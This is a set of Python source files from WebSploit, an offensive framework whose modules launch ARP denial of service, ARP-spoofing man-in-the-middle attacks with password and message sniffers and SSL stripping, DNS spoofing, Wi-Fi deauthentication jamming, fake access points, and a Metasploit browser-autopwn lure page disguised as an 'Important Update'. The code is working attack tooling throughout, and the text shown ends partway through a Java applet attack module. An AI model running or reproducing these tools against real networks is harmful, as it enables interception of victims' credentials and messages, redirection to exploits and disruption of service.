#!/usr/bin/env python
#
# WebSploit Framework Browser Autopwn module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
from core import wcolors
from core import help
from time import sleep
options =["192.168.1.1"]
def wmap():
	try:
		line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line_1 += ":"
		line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wmap" + wcolors.color.ENDC
		line_1 += " > "
		com = raw_input(line_1)
		com = com.lower()
		if com[0:10] =='set target':
			options[0] = com[11:26]
			print "TARGET => ", options[0]
			wmap()
		elif com[0:12] =='show options':
			print ""
			print "Options\t\t Value\t\t\t\t RQ\t Description"
			print "---------\t--------------\t\t\t----\t--------------"
			print "TARGET\t\t"+options[0]+"\t\t\tyes\tTarget IP Address"
			print ""
			wmap()
		elif com[0:2] =='os':
			os.system(com[3:])
			wmap()
		elif com[0:4] =='help':
			help.help()
			wmap()
		elif com[0:4] =='back':
			pass
		elif com[0:3] =='run':
			print(wcolors.color.YELLOW + "[*]Engine Has Been Started." + wcolors.color.ENDC)
			sleep(2)
			os.chdir('//tmp')
			check_tmp = os.listdir(os.curdir)
			if 'websploit_wmap.rc' in check_tmp:
				os.system('rm -rf websploit_wmap.rc')
			myfile = open ('websploit_wmap.rc', 'w')
			myfile.write('workspace -d websploit-wmap\n')
			myfile.write('workspace -a websploit-wmap\n')
			myfile.write('load wmap\n')
			myfile.write('sleep 3\n')
			myfile.write('wmap_targets -c\n')
			myfile.write('wmap_sites -a '+ options[0] + '\n')
			myfile.write('wmap_targets -t '+ options[0] + '\n')
			myfile.write('wmap_run -t\n')
			myfile.write('sleep 3\n')
			myfile.write('wmap_run -e\n')
			myfile.write('exit -y\n')
			myfile.close()
			os.system ('msfconsole -r websploit_wmap.rc')
		else:
			print "Wrong Command => ", com
			wmap()
	except(KeyboardInterrupt):
		print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)



#!/usr/bin/env python
#
# WebSploit Framework ARP Denial Of Service Attack module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from core import wcolors
from core import help
from time import sleep

options = ["192.168.1.1", "192.168.1.3", "eth0"]
def arp_dos():
	try:
		line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line_1 += ":"
		line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "ARP DOS" + wcolors.color.ENDC
		line_1 += " > "
		com = raw_input(line_1)
		com = com.lower()
		if com[0:13] =='set interface':
			interface_name = com[14:25]
			options[2] = interface_name
			print "Interface => " + options[2]
			arp_dos()
		elif com[0:10] =='set target':
			target_ip = com[11:27]
			options[1] = target_ip
			print "TARGET => " + options[1]
			arp_dos()
		elif com[0:10] =='set router':
			router_ip = com[11:27]
			options[0] = router_ip
			print "ROUTER => " + options[0]
			arp_dos()
		elif com[0:12] =='show options':
			print ""
			print "Options\t\t Value\t\t\t RQ\t Description"
			print "---------\t--------------\t\t----\t--------------"
			print "Interface\t"+options[2]+"\t\t\tyes\tNetwork Interface Name"
			print "TARGET\t\t"+options[1]+"\t\tyes\tTarget IP Address"
			print "ROUTER\t\t"+options[0]+"\t\tyes\tRouter IP Address"
			print ""
			arp_dos()
		elif com[0:2] =='os':
			os.system(com[3:])
			arp_dos()
		elif com[0:4] =='help':
			help.help()
			arp_dos()
		elif com[0:4] =='back':
			pass
		elif com[0:3] =='run':
			print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Attack Has Been Started ..." + wcolors.color.ENDC)
			command = 'ettercap -i '+ options[2] + ' -Tq -P rand_flood ' + '/'+options[0]+'/' + ' ' + '/'+options[1]+'/'
			subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
			line_4 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
			line_4 += ":"
			line_4 += wcolors.color.UNDERL + wcolors.color.BLUE + "ARP DOS" + wcolors.color.ENDC
			line_4 += " > For Stop The ARP DOS Attack Press [Enter] : "
			fin = raw_input(line_4)
			os.system('killall ettercap')
			print(wcolors.color.BOLD + wcolors.color.GREEN + "[*]Attack Stoped." + wcolors.color.ENDC)
		else:
			print "Wrong Command =>" + com
			arp_dos()
	except(KeyboardInterrupt):
		print ""



#!/usr/bin/env python
#
# WebSploit Framework Browser Autopwn module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import subprocess
from time import sleep
from core import wcolors
from core import help
options =["eth0", "192.168.1.1"]
def brow_autopwn():
	try:
		line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line_1 += ":"
		line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Browser_Autopwn" + wcolors.color.ENDC
		line_1 += " > "
		com = raw_input(line_1)
		com = com.lower()
		if com[0:9] =='set lhost':
			options[1] = com[10:25]
			print "INTERFACE => ", options[1]
			brow_autopwn()
		elif com[0:13] =='set interface':
			options[0] = com[14:19]
			print "LHOST => ", options[0]
			brow_autopwn()
		elif com[0:12] =='show options':
			print ""
			print "Options\t\t Value\t\t\t RQ\t Description"
			print "---------\t--------------\t\t----\t--------------"
			print "Interface\t"+options[0]+"\t\t\tyes\tNetwork Interface Name"
			print "LHOST\t\t"+options[1]+"\t\tyes\tLocal IP Address"
			print ""
			brow_autopwn()
		elif com[0:2] =='os':
			os.system(com[3:])
			brow_autopwn()
		elif com[0:4] =='help':
			help.help()
			brow_autopwn()
		elif com[0:4] =='back':
			pass
		elif com[0:3] =='run':
			print(wcolors.color.YELLOW + "[*]Starting WebServer ... Please Wait ..." + wcolors.color.ENDC)
			sleep(2)
			subprocess.Popen('/etc/init.d/apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			print(wcolors.color.YELLOW + "[*]Configuration DNS Spoof ... " + wcolors.color.ENDC)
			sleep(2)
			os.chdir('//tmp')
			check_tmp = os.listdir(os.curdir)
			if 'fillter.dns' in check_tmp:
				os.system('rm -rf fillter.dns')
			myfile = open('fillter.dns', 'w')
			myfile.write(options[1] + ' *')
			myfile.close()
			print(wcolors.color.YELLOW + "[*]Creating Infected Page For Victim ..." + wcolors.color.ENDC)
			sleep(3)
			os.chdir('//var//www')
			check_var = os.listdir(os.curdir)
			if 'index.html' in check_var:
				os.system('rm -rf index.html')
			myfile2 = open('index.html', 'w')
			myfile2.write('<html>\n')
			myfile2.write('<title>Important Update</title>\n')
			myfile2.write('<body>\n')
			myfile2.write('<center><h2>Important Update ... </h2></center>\n')
			myfile2.write('<center><h3>Don\'t Close The Browser<h3></center>\n')
			myfile2.write('<h3><center>Wait a Few Seconds ...</center></h3>\n')
			myfile2.write('<center><iframe src=http://' + options[1] + ':8080/index></iframe></center>\n')
			myfile2.write('</body>\n')
			myfile2.write('</html>\n')
			myfile2.close()
			print(wcolors.color.YELLOW + "[*]Engine Has Been Started." + wcolors.color.ENDC)
			sleep(2)
			os.chdir('//tmp')
			command_1 = 'dnsspoof -i ' + options[0] + ' -f fillter.dns'
			subprocess.Popen(command_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			sleep(2)
			os.system('msfcli server/browser_autopwn LHOST='+ options[1] + ' URIPATH=index E')
		else:
			print "Wrong Command => ", com
			brow_autopwn()
	except(KeyboardInterrupt):
		print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, System Exit" + wcolors.color.ENDC)




#!/usr/bin/env python
#
# WebSploit Toolkit Menu module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

from core import wcolors
def about():
	print "\n"
	print(wcolors.color.RED + "Created By :" + wcolors.color.ENDC)
	print wcolors.color.CYAN + """
	Fardin Allahverdinazhand (0x0ptim0us)
	Location : Iran - Azarbayjan (Turkish)
	Twitter : @0x0ptim0us
	Report Bug : 0x0ptim0us@Gmail.Com
	""" + wcolors.color.ENDC
	print "\n"
	print(wcolors.color.RED + "Developer Team Not Available !\n" + wcolors.color.ENDC)
	

	



#!/usr/bin/env python
#
# WebSploit Framework Man In The Middle (MITM) module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import subprocess
from core import wcolors
from core import help
from time import sleep
options = ["eth0", "192.168.1.1", "192.168.1.2", "driftnet", "true"]

def mitm():
	try:
		line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line_1 += ":"
		line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "MITM" + wcolors.color.ENDC
		line_1 += " > "
		com = raw_input(line_1)
		com = com.lower()
		if com[0:13] =='set interface':
			options[0] = com[14:20]
			print "INTERFACE => ", options[0]
			mitm()
		elif com[0:10]== 'set router':
			options[1] = com [11:26]
			print "ROUTER => ", options[1]
			mitm()
		elif com[0:10] =='set target':
			options[2] = com[11:26]
			print "TARGET => ", options[2]
			mitm()
		elif com[0:18] =='set sniffer dsniff':
			options[3] = 'dsniff'
			print "SNIFFER => ", options[3]
			mitm()
		elif com[0:20] =='set sniffer msgsnarf':
			options[3] = 'msgsnarf'
			print "SNIFFER => ", options[3]
			mitm()
		elif com[0:20] =='set sniffer urlsnarf':
			options[3] = 'urlsnarf'
			print "SNIFFER => ", options[3]
			mitm()
		elif com[0:20] =='set sniffer driftnet':
			options[3] = 'driftnet'
			print "SNIFFER => ", options[3]
			mitm()
		elif com[0:12] =='set ssl true':
			options[4] = 'true'
			print "SSL => ", options[4]
			mitm()
		elif com[0:13] =='set ssl false':
			options[4] = 'false'
			print "SSL => ", options[4]
			mitm()
		elif com[0:12] =='show options':
			print ""
			print "Options\t\t Value\t\t\t\t RQ\t Description"
			print "---------\t--------------\t\t\t----\t--------------"
			print "Interface\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
			print "ROUTER\t\t"+options[1]+"\t\t\tyes\tRouter IP Address"
			print "TARGET\t\t"+options[2]+"\t\t\tyes\tTarget IP Address"
			print "SNIFFER\t\t"+options[3]+"\t\t\tyes\tSniffer Name (Select From Sniffer List)"
			print "SSL\t\t"+options[4]+"\t\t\t\tyes\tSSLStrip, For SSL Hijacking(true or false)"
			print "\n"
			print "Sniffers\t Description"
			print "------------\t--------------"
			print "dsniff\t\t Sniff All Passwords"
			print "msgsnarf\t Sniff All Text Of Victim Messengers"
			print "urlsnarf\t Sniff Victim Links"
			print "driftnet\t Sniff Victim Images"
			print ""
			mitm()
		elif com[0:2] =='os':
			os.system(com[3:])
			mitm()
		elif com[0:4] =='help':
			help.help()
			mitm()
		elif com[0:4] =='back':
			pass
		elif com[0:3] =='run':
			if options[3] =='dsniff':
				selected_sniffer = 'dsniff -i ' + options[0]
			if options[3] =='msgsnarf':
				selected_sniffer = 'msgsnarf -i ' + options[0]
			if options[3] =='urlsnarf':
				selected_sniffer = 'urlsnarf -i ' + options[0]
			if options[3] =='driftnet':
				selected_sniffer = 'driftnet -i ' + options[0]
			sleep(2)
			if options[4] =='true':
				subprocess.Popen('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
				subprocess.Popen('sslstrip -p -k -f', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			print (wcolors.color.RED + "[*]IP Forwarding ... " + wcolors.color.ENDC)
			subprocess.Popen("echo 1 > /proc/sys/net/ipv4/ip_forward", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			sleep(2)
			print (wcolors.color.RED + "[*]ARP Spoofing ... " + wcolors.color.ENDC)
			arp_spoofing1 = 'arpspoof -i ' + options[0] + ' -t ' + options[2] +' '+ options[1]
			subprocess.Popen(arp_spoofing1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			sleep(2)
			arp_spoofing2 = 'arpspoof -i ' + options[0] + ' -t ' + options[1] +' '+ options[2]
			subprocess.Popen(arp_spoofing2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			sleep(2)
			print (wcolors.color.BLUE + "[*]Sniffer Starting ..." + wcolors.color.ENDC)
			os.system(selected_sniffer)
		else:
			print "Wrong Command => ", com
			mitm()
	except(KeyboardInterrupt):
		print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)



#!/usr/bin/env python
#
# WebSploit Framework Middle Finger Of Doom(MFOD) Attack module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import subprocess
from core import wcolors
from core import help
from time import sleep
options = ["eth0", "192.168.1.1", ".com"]
def mfod():
	try:
		line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line_1 += ":"
		line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "MFOD" + wcolors.color.ENDC
		line_1 += " > "
		com = raw_input(line_1)
		com = com.lower()
		if com[0:13] =='set interface':
			options[0] = com[14:20]
			print "INTERFACE => ", options[0]
			mfod()
		elif com[0:11] =='set redhost':
			options[1] = com[12:27]
			print "REDHOST => ", options[1]
			mfod()
		elif com[0:10] =='set domain':
			options[2] = com[11:19]
			print "DOMAIN => ", options[2]
			mfod()
		elif com[0:12] =='show options':
			print ""
			print "Options\t\t Value\t\t\t RQ\t Description"
			print "---------\t--------------\t\t----\t--------------"
			print "Interface\t"+options[0]+"\t\t\tyes\tNetwork Interface Name"
			print "REDHOST\t\t"+options[1]+"\t\tyes\tIP Address Of Any Host For Redirect Victim"
			print "DOMAIN\t\t"+options[2]+"\t\t\tyes\tType Of Domain (ex:.com)"
			print ""
			mfod()
		elif com[0:2] =='os':
			os.system(com[3:])
			mfod()
		elif com[0:4] =='help':
			help.help()
			mfod()
		elif com[0:4] =='back':
			pass
		elif com[0:3] =='run':
			sleep(2)
			subprocess.Popen('/etc/init.d/apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			try:
				os.chdir('/usr/local/share/ettercap')
				check_dir = os.listdir(os.curdir)
				if 'etter.dns' in check_dir:
					os.system('mv /usr/local/share/ettercap/etter.dns etter.dns.old')
				my_etter = open('etter.dns', 'w')
				my_etter.write('*'+ options[2] + '\tA' + '\t'+ options[1])
				my_etter.close()
			except(OSError):
				print(wcolors.color.RED + wcolors.color.BOLD + "[*]Checking Ettercap ... Please Wait ..." + wcolors.color.ENDC)
			try:
				os.chdir('/usr/share/ettercap')
				check_dir = os.listdir(os.curdir)
				if 'etter.dns' in check_dir:
					os.system('mv /usr/share/ettercap/etter.dns etter.dns.old')
				my_etter = open('etter.dns', 'w')
				my_etter.write('*'+ options[2] + '\tA' + '\t'+ options[1])
				my_etter.close()
			except(OSError):
				print(wcolors.color.RED + wcolors.color.BOLD + "[*]Checking Ettercap ... Please Wait ..." + wcolors.color.ENDC)
			print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]DNS Spoofing Starting ..." + wcolors.color.ENDC)
			dns_spoofing = 'ettercap -Tqi ' + options[0] + ' -M arp // // -P dns_spoof'
			subprocess.Popen(dns_spoofing, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
			print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]MFOD Attack Has Been Started." + wcolors.color.ENDC)
			print(wcolors.color.BOLD + wcolors.color.RED + "[*]Notice : After Attack Press [ENTER] For Cleanup [tmp] File's" + wcolors.color.ENDC)
			line_4 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
			line_4 += ":"
			line_4 += wcolors.color.UNDERL + wcolors.color.BLUE + "MFOD" + wcolors.color.ENDC
			line_4 += " > After Your Attack Finished Press [Enter] For Cleanup : "
			cln_enter = raw_input(line_4)
			print(wcolors.color.YELLOW + "[*]Cleaning [tmp] File's For Next Attack , Please Wait ..." + wcolors.color.ENDC)
			sleep(2)
			os.system('rm -rf /usr/local/share/ettercap/etter.dns')
			os.system('rm -rf /usr/share/ettercap/etter.dns')
			os.system('killall ettercap')
			print(wcolors.color.GREEN + "Cleanup Successfully." + wcolors.color.ENDC)
		else:
			print "Wrong Command => ", com
	except(KeyboardInterrupt,OSError):
			print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)



#!/usr/bin/env python
#
# WebSploit Framework Wifi Jammer module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from core import wcolors
from core import help
from time import sleep

options = ["wlan0", "", "", "mon0", "11"]

def wifi_jammer():
    try:
        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
        line_1 += ":"
        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wifi_Jammer" + wcolors.color.ENDC
        line_1 += " > "
        com = raw_input(line_1)
        com = com.lower()
        if com[0:13] == 'set interface':
            options[0] = com[14:20]
            print "INTERFACE => ", options[0]
            wifi_jammer()
        elif com[0:9] == 'set bssid':
            options[1] = com[10:]
            print "BSSID => ", options[1]
            wifi_jammer()
        elif com[0:9] =='set essid':
            options[2] = com[10:]
            print "ESSID => ", options[2]
            wifi_jammer()
        elif com[0:7] =='set mon':
            options[3] = com[8:12]
            print "MON => ", options[3]
            wifi_jammer()
        elif com[0:11] =='set channel':
            options[4] = com[12:14]
            print "CHANNEL => ", options[4]
            wifi_jammer()
        elif com[0:2] =='os':
            os.system(com[3:])
            wifi_jammer()
        elif com[0:4] =='help':
            help.help()
            wifi_jammer()
        elif com[0:4] =='back':
            pass
        elif com[0:12] =='show options':
            print ""
            print "Options\t\t Value\t\t\t\t RQ\t Description"
            print "---------\t--------------\t\t\t----\t--------------"
            print "interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name"
            print "bssid\t\t"+options[1]+"\t\t\t\tyes\tTarget BSSID Address"
            print "essid\t\t"+options[2]+"\t\t\t\tyes\tTarget ESSID Name"
            print "mon\t\t"+options[3]+"\t\t\t\tyes\tMonitor Mod(default)"
            print "channel\t\t"+options[4]+"\t\t\t\tyes\tTarget Channel Number"
            print ""
            wifi_jammer()
        elif com[0:4] =='scan':
            xterm_1 = "airmon-ng start " + options[0]
            xterm_2 = "xterm -e airodump-ng " + options[3] + " &"
            subprocess.Popen(xterm_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            sleep(3)
            os.system(xterm_2)
            wifi_jammer()
        elif com[0:3] =='run':
            print (wcolors.color.GREEN + "[*]Attack Has Been Started on : " + options[2] + wcolors.color.ENDC)
            xterm_3 = "xterm -e airodump-ng -c " + options[4] + " --bssid " + options[1] + " " + options[3] + " &"
            os.system(xterm_3)
            sleep(4)
            xterm_4 = "xterm -e aireplay-ng --deauth 9999999999999 -o 1 -a " + options[1] + " -e " + options[2] + " " + options[3] + " &"
            os.system(xterm_4)
            sleep(1)
            os.system(xterm_4)
            wifi_jammer()
        elif com[0:4] =='stop':
            subprocess.Popen("killall xterm", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            subprocess.Popen("killall aireplay", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            wifi_jammer()
        else:
            print "Wrong Command => ", com
            wifi_jammer()
    except(KeyboardInterrupt):
        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)


#!/usr/bin/env python
# WebSploit Toolkit
# Idea By Dave Kennedy
# Created By Fardin Allahverdinazhand (0x0ptim0us)
class color:
	PURPLE = '\033[95m'
	CYAN = '\033[96m'
	DARKCYAN = '\033[36m'
	BLUE = '\033[94m'
	GREEN = '\033[92m'
	YELLOW = '\033[93m'
	RED = '\033[91m'
	BOLD = '\033[1m'
	UNDERL = '\033[4m'
	ENDC = '\033[0m'
	backBlack = '\033[40m'
	backRed = '\033[41m'
	backGreen = '\033[42m'
	backYellow = '\033[43m'
	backBlue = '\033[44m'
	backMagenta = '\033[45m'
	backCyan = '\033[46m'
	backWhite = '\033[47m'



#!/usr/bin/env python
#
# WebSploit Framework CloudFlare Resolver module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import socket
from core import wcolors
from core import help
from time import sleep

options = ["google.com"]
def cloudflare_resolver():
    try:
        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
        line_1 += ":"
        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "CloudFlare Resolver" + wcolors.color.ENDC
        line_1 += " > "
        com = raw_input(line_1)
        com = com.lower()
        if com[0:10] =="set target":
            options[0]=com[11:]
            print "TARGET => ", options[0]
            cloudflare_resolver()
        elif com[0:12] =='show options':
            print ""
            print "Options\t\t Value\t\t\t RQ\t Description"
            print "---------\t--------------\t\t----\t--------------"
            print "Target\t\t"+options[0]+"\t\tyes\tTarget Address"
            cloudflare_resolver()
        elif com[0:2] =='os':
            os.system(com[3:])
            cloudflare_resolver()
        elif com[0:4] =='help':
            help.help()
            cloudflare_resolver()
        elif com[0:4] =='back':
            pass
        elif com[0:3] =='run':
            sub = ('mail', 'webmail', 'email', 'direct-connect-mail',
'direct', 'direct-connect', 'cpanel', 'ftp', 'forum', 'blog',
'm', 'dev', 'record', 'ssl', 'dns', 'help', 'ns', 'ns1', 'ns2',
'ns3', 'ns4', 'irc', 'server', 'status', 'status', 'portal', 'beta',
'admin', 'imap', 'smtp')
            try:
                orgip = socket.gethostbyname(options[0])
                print "[-------------------------]"
                print "[+] Default IP Address : %s"%orgip
                print "[-------------------------]"
            except(socket.gaierror):
                print "[-] Error : Host is Down !"
            for i in sub:
                host = i+'.'+options[0]
                try:
                    ip = socket.gethostbyname(host)
                    print "[+] %s : %s"%(host, ip)
                except(socket.gaierror):
                    print "[-] %s : N/A"%host
            cloudflare_resolver()
        else:
            print "Wrong Command =>" + com
    except(KeyboardInterrupt):
        print "\n[!] Operation Stoped By User."


#!/usr/bin/env python
#
# WebSploit Framework Man Left In The Middle (MLITM) Attack module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
from core import wcolors
from core import help
from time import sleep
def mlitm():
	try:
		print ""
		print (wcolors.color.YELLOW + "[*]Written by Kyle Osborn")
		print ("[*]kyle@kyleosborn.com")
		print ("[*]This is not an exploit tool, it's a payload tool.\n[*]Once you've found the exloit, and you're able to inject javascript,\n[*]just stick this in there as a script.\n[*]<script src='http://YOURIP/'>" + wcolors.color.ENDC)
		print (wcolors.color.BLUE + "[*]Stoping Web Server ... "+ wcolors.color.ENDC)
		sleep(2)
		os.system('xterm -e service apache2 stop')
		print (wcolors.color.BLUE + "[*]Web Server Has Been Stoped."+ wcolors.color.ENDC)
		line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line_1 += ":"
		line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "MLITM" + wcolors.color.ENDC
		line_1 += " >  "	
		com = raw_input(line_1)
		if com[0:3] =='run':
			os.system('python modules/thebiz.py')
		elif com[0:12] =='show options':
			print "This Module Not Have Any Options, Insert [run] Command For Execute, Module restarting ..."
			sleep(2)
			mlitm()
		elif com[0:2] =='os':
			os.system(com[3:])
			mlitm()
		elif com[0:4] =='help':
			help.help()
			mlitm()
		elif com[0:4] =='back':
			pass
		else:
			print "Wrong Command => ", com
	except(KeyboardInterrupt):
		print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)



#!/usr/bin/env python
#
# WebSploit Framework Wifi Honeypot (Fake Access Point) module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from time import sleep
from core import help
from core import wcolors

options = ["wlan0", "FreeNet", "9", "a1:a2:a3:a4:a5:a6", "/home/wh_logs.txt", "mon0", "1"]

def wifi_honeypot():
    try:
        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
        line_1 += ":"
        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wifi_Honeypot" + wcolors.color.ENDC
        line_1 += " > "
        com = raw_input(line_1)
        com = com.lower()
        if com[0:13] == 'set interface':
            options[0] = com[14:20]
            print "INTERFACE => ", options[0]
            wifi_honeypot()
        elif com[0:9] == 'set essid':
            options[1] = com[10:]
            print "ESSID => ", options[1]
            wifi_honeypot()
        elif com[0:11] == 'set channel':
            options[2] = com[12:14]
            print "CHANNEL => ", options[2]
            wifi_honeypot()
        elif com[0:7] == 'set mac':
            options[3] = com[8:25]
            print "MAC => ", options[3]
            wifi_honeypot()
        elif com[0:10] == 'set output':
            options[4] = com[11:]
            print "OUTPUT => ", options[4]
            wifi_honeypot()
        elif com[0:7] == 'set mon':
            options[5] = com[8:12]
            print "MON => ", options[5]
            wifi_honeypot()
        elif com[0:11] =='set encrypt':
            options[6] = com[12:13]
            print "ENCRYPT => ", options[6]
            wifi_honeypot()
        elif com[0:2] =='os':
            os.system(com[3:])
            wifi_honeypot()
        elif com[0:4] =='help':
            help.help()
            wifi_honeypot()
        elif com[0:4] =='back':
            pass
        elif com[0:12] =='show options':
            print ""
            print "Options\t\t Value\t\t\t\t RQ\t Description"
            print "---------\t--------------\t\t\t----\t--------------"
            print "interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name"
            print "essid\t\t"+options[1]+"\t\t\t\tyes\tFakeAP Essid"
            print "channel\t\t"+options[2]+"\t\t\t\tyes\tFakeAP Channel"
            print "mac\t\t"+options[3]+"\t\tyes\tFakeAP Mac Address"
            print "output\t\t"+options[4]+"\t\tyes\tLog File Location"
            print "mon\t\t"+options[5]+"\t\t\t\tyes\tMonitor Mod(default)"
            print "encrypt\t\t"+options[6]+"\t\t\t\tyes\tType Of Encryptions"
            print "\n"
            print "Numbers\t\t Encryptions"
            print "-------\t\t--------------"
            print "1\t\t Unencrypted"
            print "2\t\t wep"
            print "3\t\t wpa"
            print "4\t\t wpa2"
            print ""
            wifi_honeypot()
        elif com[0:3] == 'run':
            comm1= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
            comm2= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
            comm3= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -z 2 %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
            comm4= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -Z 4 %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
            monit_mod_start= "airmon-ng start %s" % (options[1])
            print(wcolors.color.GREEN+"[*]Enable monitor mod on your interface [%s] ..."+wcolors.color.ENDC)% (options[0]),
            subprocess.Popen(monit_mod_start, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
            print(wcolors.color.GREEN+"[*]Creating Fake Access Point ..."+wcolors.color.ENDC),
            if options[6]==1:
                os.system(comm1)
            elif options[6]==2:
                os.system(comm2)
            elif options[6]==3:
                os.system(comm3)
            elif options[6]==4:
                os.system(comm4)
            else:
                print(wcolors.color.RED+"[!]Error : Encryption ID not Found!"+wcolors.color.ENDC)
                pass
            sleep(2)
            print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
            wifi_honeypot()
        elif com[0:4]=='stop':
            os.system("killall xterm")
            os.system("killall airbase-ng")
            wifi_honeypot()
        else:
            print "Wrong Command => ", com
            wifi_honeypot()
    except(KeyboardInterrupt):
        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)


#!/usr/bin/env python
#
# WebSploit FrameWork Menu module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

from core import wcolors

def main_info():
	ston = wcolors.color.BLUE + "[" + wcolors.color.ENDC
	print ""
	print "\t\t--=" + ston + wcolors.color.GREEN + "WebSploit Advanced MITM Framework" + wcolors.color.ENDC
	print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "3.0.0" + wcolors.color.ENDC
	print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "Katana" + wcolors.color.ENDC
	print "\t+---**---==" + ston + "Available Modules : " + wcolors.color.GREEN + "20" + wcolors.color.ENDC
	print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r3.0.0-000 20.9.2014" + wcolors.color.ENDC + "]"
	print "\n\n"



#!/usr/bin/env python
#
# WebSploit Framework Java Signed Applet Attack module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import subprocess
from core import wcolors
from core import help
from time import sleep

options = ["eth0", "192.168.1.1", "Java", "Java"]
def java_applet():
	try:
		line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line_1 += ":"
		line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Java_Applet" + wcolors.color.ENDC
		line_1 += " > "
		com = raw_input(line_1)
		com = com.lower()
		if com[0:13] =='set interface':
			options[0] = com[14:20]
			print "INTERFACE => ", options[0]
			java_applet()
		elif com[0:9] =='set lhost':
			options[1] = com[10:25]
			print "LHOST => ", options[1]
			java_applet()
		elif com[0:9] =='set class':
			options[2] = com[10:25]
			print "CLASS => ", options[2]
			java_applet()
		elif com[0:13] =='set publisher':
			options[3] = com[14:25]
			print "PUBLISHER => ", options[3]
